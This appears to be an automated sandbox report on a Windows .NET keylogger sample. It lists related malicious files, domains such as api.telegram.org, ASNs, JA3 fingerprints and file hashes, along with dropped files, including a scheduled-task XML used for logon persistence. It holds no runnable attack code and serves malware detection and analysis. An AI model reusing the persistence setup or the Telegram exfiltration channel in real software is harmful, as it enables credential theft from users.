api.telegram.org	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	KrnlSetup.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	149.154.167.220
	FATR98765678000.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	run.cmd	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	jXN37dkptv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
reallyfreegeoip.org	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	Request for Quotation_10.12.2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	FATR98765678000.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.6
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	rPurchaseOrder_PO19202409.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	KrnlSetup.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	149.154.167.220
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	run.cmd	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	jXN37dkptv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	tmpCA68.HtM.htm	Get hash	malicious	Unknown	Browse	104.18.25.163
	ple.bat	Get hash	malicious	Unknown	Browse	104.16.230.132
	https://github.com/greenshot/greenshot/releases/download/Greenshot-RELEASE-1.2.10.6/Greenshot-INSTALLER-1.2.10.6-RELEASE.exe	Get hash	malicious	Unknown	Browse	172.67.164.214
	https://app.droplet.io/form/yEoAzK	Get hash	malicious	Unknown	Browse	104.22.59.181
	https://app.droplet.io/form/yEoAzK	Get hash	malicious	Unknown	Browse	172.67.40.50
	https://ytfjghloadv1.b-cdn.net/proCESSINGveriffv001.html	Get hash	malicious	CAPTCHA Scam ClickFix, LummaC Stealer	Browse	104.21.80.1
	Recibos.exe	Get hash	malicious	FormBook	Browse	172.67.182.171
	FPqVs6et5F.exe	Get hash	malicious	Unknown	Browse	104.18.8.204
UTMEMUS	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	FATR98765678000.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	file.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Request for Quotation New collaboration.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	https://github.com/greenshot/greenshot/releases/download/Greenshot-RELEASE-1.2.10.6/Greenshot-INSTALLER-1.2.10.6-RELEASE.exe	Get hash	malicious	Unknown	Browse	172.67.177.134
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	Request for Quotation_10.12.2024.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	ple.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://ytfjghloadv1.b-cdn.net/proCESSINGveriffv001.html	Get hash	malicious	CAPTCHA Scam ClickFix, LummaC Stealer	Browse	149.154.167.220
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	149.154.167.220
	EEMsLiXoiTzoaDd.scr	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Client-built.exe	Get hash	malicious	Discord Rat	Browse	149.154.167.220
	KrnlSetup.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Client-built.exe	Get hash	malicious	Discord Rat	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hesap_Hareketleri_09122024_html.exe.log

Download File

Process:	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	16AD599332DD2FF94DA0787D71688B62
SHA1:	02F738694B02E84FFE3BAB7DE5709001823C6E40
SHA-256:	452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
SHA-512:	A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0uua0xcn.jux.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3my3vveq.2o2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnjwq4ds.jns.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpnapqxd.ako.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fzan32oo.ktk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ignyguij.zcz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qavs3yt0.jw2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vq0otf5z.5zb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp211D.tmp

Download File

Process:	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1596
Entropy (8bit):	5.0918005824701975
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLn+xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTWv
MD5:	2A04CEA9A18099E9998CF640063D77AE
SHA1:	C6002E0F2ED1BD4B2435503D0BCCA15B9526C95E
SHA-256:	E7FD66C41E29EB1E0605F99BD9B4CE05F9321B8171A9B7F3857FF6FE380B1B70
SHA-512:	F9151928D37135BE4BF353D5B48EF739B699A339F80DAFB9F637BC5AB811C76D31DF3B4767C051C960D34DA1BE8A8DDFAA5E845A9A7AA9D96BCC9BEE28F3C85A
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Local\Temp\tmp335D.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1596
Entropy (8bit):	5.0918005824701975
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLn+xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTWv
MD5:	2A04CEA9A18099E9998CF640063D77AE
SHA1:	C6002E0F2ED1BD4B2435503D0BCCA15B9526C95E
SHA-256:	E7FD66C41E29EB1E0605F99BD9B4CE05F9321B8171A9B7F3857FF6FE380B1B70
SHA-512:	F9151928D37135BE4BF353D5B48EF739B699A339F80DAFB9F637BC5AB811C76D31DF3B4767C051C960D34DA1BE8A8DDFAA5E845A9A7AA9D96BCC9BEE28F3C85A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Download File

Process:	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1001472
Entropy (8bit):	6.936538326587406
Encrypted:	false
SSDEEP:	12288:Kfe0GVO35OOvzI/wDadTZoieenOIbgIC+Ukq09xZmFP85h7ScC3:Kff3c4uWadT+i3/bTUkqc8P8zSc
MD5:	A1D6C4EE5E1BF8E8E8E335E25E3CB4EF
SHA1:	D55F64167243A1211AD7B3F51174C70F2D3D1C3D
SHA-256:	0B0E33A49E209932B6FA85BE230050E28ED46E35129A3B4B0B6F782AC4849F21
SHA-512:	BE8182BF4B9BEF516DC113B05B2C3D0F834C1D8BB40F266DA9948E23339EA94A2C63484F335DA46410D5E6E291F997A2E9E2DFC32DA73CD51DB0FB053FEA44C8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M................0..>...........]... ...`....@.. ....................................@..................................\..O....`..............................\|D..p............................................ ............... ..H............text...$=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............F..............@..B.................\......H............R......J........e...........................................0............}......}.....(.......(......{...........%.r...p(....s.....%.r...p(....s.....%.r%..p(....s.......o.......(...+....-....o....&..0...........s2.....o.......0...........sA.....o.......0...........s/.....o.......0...........s8.....o.......0...........s;.....o.......0...........s>.....o.......0...........s5.....o.......0...........sD.....o.......0...........sG.....o.......0...........s .

C:\Users\user\AppData\Roaming\EfgRyiVrT.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.936538326587406
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Hesap_Hareketleri_09122024_html.exe
File size:	1'001'472 bytes
MD5:	a1d6c4ee5e1bf8e8e8e335e25e3cb4ef
SHA1:	d55f64167243a1211ad7b3f51174c70f2d3d1c3d
SHA256:	0b0e33a49e209932b6fa85be230050e28ed46e35129a3b4b0b6f782ac4849f21
SHA512:	be8182bf4b9bef516dc113b05b2c3d0f834c1d8bb40f266da9948e23339ea94a2c63484f335da46410d5e6e291f997a2e9e2dfc32da73cd51db0fb053fea44c8
SSDEEP:	12288:Kfe0GVO35OOvzI/wDadTZoieenOIbgIC+Ukq09xZmFP85h7ScC3:Kff3c4uWadT+i3/bTUkqc8P8zSc
TLSH:	9625C53C09BD12EB80A5C79DCBE89827F614A86FB150ADA494D647A53357F4B34C323E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M................0..>...........]... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4f5d1e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x82004D95 [Fri Feb 11 17:25:41 2039 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
